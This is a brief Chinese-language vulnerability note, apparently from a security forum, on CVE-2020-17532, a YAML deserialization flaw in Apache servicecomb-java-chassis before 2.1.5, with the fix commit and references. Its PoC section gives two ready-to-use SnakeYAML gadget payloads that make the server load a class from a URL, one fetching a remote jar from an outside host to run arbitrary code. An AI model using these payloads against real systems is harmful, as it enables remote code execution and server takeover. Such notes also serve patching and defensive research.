# CVE-2020-17532 Apache servicecomb-java-chassis Yaml 反序列化漏洞
在servicecomb-java-chassis中启用处理程序-路由器组件时,经过身份验证的用户可能会注入一些数据并导致任意代码执行。
**commit:**
https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c
影响版本:< 2.1.5 **PoC:** ``` !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]] ``` ``` !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://artsploit.com/yaml-payload.jar"] ]] ] ``` ref: * https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c * https://seclists.org/oss-sec/2021/q1/60 * https://forum.ywhack.com/thread-115020-1-1.html
请登录后查看评论内容